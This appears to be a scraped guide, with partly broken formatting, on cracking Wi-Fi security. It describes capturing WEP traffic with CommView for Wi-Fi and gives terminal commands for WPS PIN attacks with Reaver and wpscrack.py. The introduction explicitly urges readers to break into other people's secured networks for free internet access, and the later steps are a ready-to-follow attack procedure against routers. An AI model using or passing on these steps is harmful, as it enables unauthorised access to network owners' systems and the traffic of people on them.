Professional Documents
Culture Documents
An internet connection has become a basic necessity in our modern lives. Wireless hot-spots (commonly known as Wi-Fi) can be found everywhere! If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key. Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down. Cracking those Wi-Fi passwords is your answer to temporary internet access. This is a comprehensive guide which will teach even complete beginners how to crack WEP encrypted networks, easily.
Table of Contents
1. 2. 3. 4. 5. 6. 7. How are Wireless networks secured? What you'll need Setting up CommView for Wi-Fi Selecting the target network and capturing packets Waiting... Now the interesting part... CRACKING! Are you a visual learner?
This is by far the biggest requirement.The wireless card of your computer has to be compatible with the software CommVIew. This ensures that the wireless card can go into monitor mode which is essential for capturing packets.Click here to check if your wireless card is compatible
This software will be used to capture the packets from the desired network adapter.Click here and download the software from the website. After capturing the packets this software does the actual cracking.Click here-Click here and download the software from the website.
Download the zip file of CommView for Wi-Fi from the website. Extract the file and run setup.exe to install CommView for Wi-Fi. When CommView opens for the first time it has a driver installation guide. Follow the prompts to install the driver for your wireless card. Run CommView for Wi-Fi. Click the play icon on the top left of the application window.
Start scanning for wireless networks. CommView now starts scanning for wireless networks channel by channel. After a few minutes you will have a long list of wireless networks with their security type and signal. Now it is time to choose your target network
So make sure you select a network with WEP next to its name
Choose a network with the highest signal. Each network will have its details in the right column. Make sure the WEP network you are choosing has the least the least dB (decibel) value.
Once you have chosen your target network,select it and click Capture to start capturing packets from the desired channel. Now you might notice that packets are being captured from all the networks in the particular channel. To capture packets only from the desired network follow the given steps.
Right click the desired network and click on copy MAC Address. Switch to the Rules tab on the top. On the left hand side choose MAC Addresses Enable MAC Address rules For 'Action' select 'capture' and for 'Add record' select 'both'. Now paste the mac address copied earlier in the box below.
We need to capture only data packets for cracking. Hence select D on the bar at the top of the window and deselect M (Management packets) and C (Control packets). Now you have to save the packets so that they can be cracked later. To do this-
Go to the logging tab on top and enable auto saving. Set Maximum Directory Size to 2000 Set Average Log File Size to 20.
Step 3: Waiting...
Now the boring part- WAITING! NOTE: The amount of time taken to capture enough data packets depends on the signal and the networks usage. The minimum number of packets you should capture should be 100,000 for a decent signal. After you think you have enough packets (at least 100,000 packets)
Go to the log tab and click on concatenate logs. Select all the logs that have been saved. Do not close CommView for Wi-Fi Now navigate to the folder where the concatenated logs have been saved
Open the log file Select File- Export -Wire shark tcpdump format and choose any suitable destination. This will save the logs with a .cap extension to that location
You may also receive a request to try with more packets. In this case wait until more packets have been captured and repeat the steps to be performed after capturing packets BEST OF LUCK
Requirements
Linux OS A router at home with WPS The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev
Tools
Reaver (support for all routers) wpscrack (faster, but only support for major router brands)
Crack WPS
Text in bold is a terminal command. Follow the guide that corresponds to the tool that you chose to use below.
Reaver
1. Unzip Reaver. unzip reaver-1.3.tar.gz Change to the Reaver directory. cd reaver-1.3 Configure, compile and install the application. ./configure && make && sudo make install Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX). sudo iwlist scan wlan0 Set your device into monitor mode. sudo airmon-ng start wlan0 Run the tool against an access point. reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv Wait until it finishes.
2.
3.
4.
5.
6.
7.
wpscrack.py
1. Make the program an executable. chmod +x wpscrack.py Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX). sudo iwlist scan wlan0 Get your MAC address, save it for later. ip link show wlan0 | awk '/ether/ {print $2}' Set your device into monitor mode. sudo airmon-ng start wlan0 Attack your AP. wpscrack.py iface mon0 client <your MAC, because you're attacking yourself, right?> bssid <AP MAC address> --ssid <name of your AP> -v Await victory.
2.
3.
4.
5.
6.
Now, let's hope we see a lot of firmware update action going on in the near future, or else a lot of places are in a whole world of trouble.